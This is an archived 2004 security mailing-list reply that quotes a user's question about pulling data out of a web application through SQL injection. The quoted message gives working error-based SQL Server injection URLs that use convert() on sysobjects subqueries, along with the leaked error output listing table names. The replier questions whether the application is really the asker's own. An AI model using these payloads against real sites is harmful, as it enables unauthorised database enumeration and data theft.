WebApp Sec mailing list archives
Re: SQL Injection data retrieving??
From: "Adam Tuliper" <amt () gecko-software com>
Date: Sun, 12 Sep 2004 09:48:19 -0400
if it is your app as you said, wouldnt you then know if:
I assume that "__big_field" is the name of the databse? Right?
was indeed your own application's db name? : ) On Fri, 10 Sep 2004 10:44:58 -0400 "Adam Tuliper" <amt () gecko-software com> wrote:
If I read this right.. you are first testing against your own application before the pentest, right? On 10 Sep 2004 12:06:56 -0000 Roland Despins <roland2004 () romandie com> wrote:Hi, I'm practicing myself for a pentest. I'm trying to retrieve datas from a DB using some SQL injections. From now I asume that my WebApp is vulnerable to SQLinjections. First I've sent this URL: www.mysite.com/products.asp?id=convert(int,(select top1name from sysobjects where xtype='u' order by asc)) And I've goot the following error: Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value'__big_field'to a column of data type int. /products.asp, line 32 I assume that "__big_field" is the name of the databse? Right? Secondly I've sent the the following URL in order togetthe table name: www.mysite.com/products.asp?id=convert(int,(select top1name from sysobjects where xtype='u' and name>'__big_field' order by 1 asc)) Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__dellist'toa column of data type int. /products.asp, line 32 So "__dellist" is a table from the "__big_field" database? Right? Now here comes the troubles... I would like to retrieve the columns name of the "__dellist" table and the dataofthe "__dellist". I've sent: www.mysite.com/products.asp?id=convert(int,(select *from__dellist where 1=1)) Error Type: Microsoft OLE DB Provider for SQL Server (0x80004005) Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, = or when the subquery is used as an expression. /products.asp, line 32 My question is: Which query should I sent i order to retrieve the data of the table?? Thanks a lot in advance for your help Roland
---------------------------------------------------------------------
Web mail provided by NuNet, Inc. The Premier National provider. http://www.nni.com/
--------------------------------------------------------------------- Web mail provided by NuNet, Inc. The Premier National provider. http://www.nni.com/
Current thread:
- SQL Injection data retrieving?? Roland Despins (Sep 10)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 11)
- Re: SQL Injection data retrieving?? saphyr (Sep 12)
- Re: SQL Injection data retrieving?? nummish (Sep 11)
- Re: SQL Injection data retrieving?? Ben Timby (Sep 11)
- Re: SQL Injection data retrieving?? Adam Tuliper (Sep 11)
- Re: SQL Injection data retrieving?? Adam Tuliper (Sep 12)
- Re: SQL Injection data retrieving?? saphyr (Sep 12)
- <Possible follow-ups>
- Re: SQL Injection data retrieving?? Roland Despins (Sep 12)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 13)
- RE: SQL Injection data retrieving?? Mark McDonald (Sep 13)
- Re: SQL Injection data retrieving?? Roland Despins (Sep 13)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 15)
- RE: SQL Injection data retrieving?? Peter Harrison (Sep 16)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 15)
- RE: SQL Injection data retrieving?? Shields, Larry (Sep 18)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 11)